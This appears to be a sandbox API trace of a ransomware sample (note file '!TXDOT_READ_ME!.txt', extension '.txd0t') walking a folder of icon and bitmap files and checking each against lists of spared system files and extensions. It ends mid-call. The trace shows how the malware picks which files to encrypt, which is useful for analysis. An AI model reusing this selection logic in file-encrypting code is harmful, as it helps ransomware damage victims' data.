[0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="debug.txt") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="boot.ini") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="desktop.ini") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="autorun.inf") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="ntuser.dat") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="ntldr") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="ntdetect.com") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="bootfont.bin") returned 1 [0086.894] StrCmpIW (psz1="Rotate7.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.894] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0086.894] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.894] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0086.895] StrCmpW (psz1="Rotate8.ico", psz2=".") returned 1 [0086.895] StrCmpW (psz1="Rotate8.ico", psz2="..") returned 1 [0086.895] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate8.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" [0086.895] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0086.895] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="bootsect.bak") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="iconcache.db") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="thumbs.db") returned -1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2=" ransomware ") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2=" ransom ") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="debug.txt") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="boot.ini") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="desktop.ini") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="autorun.inf") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="ntuser.dat") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="ntldr") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="ntdetect.com") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="bootfont.bin") returned 1 [0086.895] StrCmpIW (psz1="Rotate8.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.895] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0086.895] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.895] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0086.895] StrCmpW (psz1="Save.ico", psz2=".") returned 1 [0086.895] StrCmpW (psz1="Save.ico", psz2="..") returned 1 [0086.895] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Save.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Save.ico" [0086.895] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0086.895] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.895] StrCmpIW (psz1="Save.ico", psz2="bootsect.bak") returned 1 [0086.895] StrCmpIW (psz1="Save.ico", psz2="iconcache.db") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="thumbs.db") returned -1 [0086.896] StrCmpIW (psz1="Save.ico", psz2=" ransomware ") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2=" ransom ") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="debug.txt") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="boot.ini") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="desktop.ini") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="autorun.inf") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="ntuser.dat") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="ntldr") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="ntdetect.com") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="bootfont.bin") returned 1 [0086.896] StrCmpIW (psz1="Save.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.896] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0086.896] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.896] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0086.896] StrCmpW (psz1="Setup.ico", psz2=".") returned 1 [0086.896] StrCmpW (psz1="Setup.ico", psz2="..") returned 1 [0086.896] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.896] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.896] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Setup.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" [0086.896] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0086.896] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="bootsect.bak") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="iconcache.db") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="thumbs.db") returned -1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2=" ransomware ") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2=" ransom ") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="debug.txt") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="boot.ini") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="desktop.ini") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="autorun.inf") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="ntuser.dat") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="ntldr") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="ntdetect.com") returned 1 [0086.896] StrCmpIW (psz1="Setup.ico", psz2="bootfont.bin") returned 1 [0086.897] StrCmpIW (psz1="Setup.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.897] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0086.897] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.897] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0086.897] StrCmpW (psz1="stop.ico", psz2=".") returned 1 [0086.897] StrCmpW (psz1="stop.ico", psz2="..") returned 1 [0086.897] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="stop.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned="C:\\588bce7c90097ed212\\Graphics\\stop.ico" [0086.897] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0086.897] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="bootsect.bak") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="iconcache.db") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="thumbs.db") returned -1 [0086.897] StrCmpIW (psz1="stop.ico", psz2=" ransomware ") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2=" ransom ") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="debug.txt") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="boot.ini") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="desktop.ini") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="autorun.inf") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="ntuser.dat") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="ntldr") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="ntdetect.com") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="bootfont.bin") returned 1 [0086.897] StrCmpIW (psz1="stop.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.897] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0086.897] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.897] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0086.897] StrCmpW (psz1="SysReqMet.ico", psz2=".") returned 1 [0086.897] StrCmpW (psz1="SysReqMet.ico", psz2="..") returned 1 [0086.897] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" [0086.897] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0086.898] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="bootsect.bak") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="iconcache.db") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="thumbs.db") returned -1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransomware ") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransom ") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="debug.txt") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="boot.ini") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="desktop.ini") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="autorun.inf") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="ntuser.dat") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="ntldr") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="ntdetect.com") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="bootfont.bin") returned 1 [0086.898] StrCmpIW (psz1="SysReqMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.898] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0086.898] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.898] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0086.898] StrCmpW (psz1="SysReqNotMet.ico", psz2=".") returned 1 [0086.898] StrCmpW (psz1="SysReqNotMet.ico", psz2="..") returned 1 [0086.898] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.898] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.898] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqNotMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" [0086.898] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0086.898] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootsect.bak") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="iconcache.db") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="thumbs.db") returned -1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransomware ") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransom ") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="debug.txt") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="boot.ini") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="desktop.ini") returned 1 [0086.898] StrCmpIW (psz1="SysReqNotMet.ico", psz2="autorun.inf") returned 1 [0086.899] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntuser.dat") returned 1 [0086.899] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntldr") returned 1 [0086.899] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntdetect.com") returned 1 [0086.899] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootfont.bin") returned 1 [0086.899] StrCmpIW (psz1="SysReqNotMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.899] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0086.899] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.899] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0086.899] StrCmpW (psz1="warn.ico", psz2=".") returned 1 [0086.899] StrCmpW (psz1="warn.ico", psz2="..") returned 1 [0086.899] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.899] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0086.899] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="warn.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned="C:\\588bce7c90097ed212\\Graphics\\warn.ico" [0086.899] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0086.899] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="bootsect.bak") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="iconcache.db") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="thumbs.db") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2=" ransomware ") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2=" ransom ") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="debug.txt") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="boot.ini") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="desktop.ini") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="autorun.inf") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="ntuser.dat") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="ntldr") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="ntdetect.com") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="bootfont.bin") returned 1 [0086.899] StrCmpIW (psz1="warn.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.899] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0086.899] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.899] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0086.900] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0086.900] GetProcessHeap () returned 0xe30000 [0086.900] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.900] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0086.900] StrCmpW (psz1="header.bmp", psz2=".") returned 1 [0086.900] StrCmpW (psz1="header.bmp", psz2="..") returned 1 [0086.900] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.900] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.900] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="header.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\header.bmp") returned="C:\\588bce7c90097ed212\\header.bmp" [0086.900] PathFindExtensionW (pszPath="header.bmp") returned=".bmp" [0086.900] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="bootsect.bak") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="iconcache.db") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="thumbs.db") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2=" ransomware ") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2=" ransom ") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="debug.txt") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="boot.ini") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="desktop.ini") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="autorun.inf") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="ntuser.dat") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="ntldr") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="ntdetect.com") returned -1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="bootfont.bin") returned 1 [0086.901] StrCmpIW (psz1="header.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.901] PathFindExtensionW (pszPath="header.bmp") returned=".bmp" [0086.901] StrStrIW 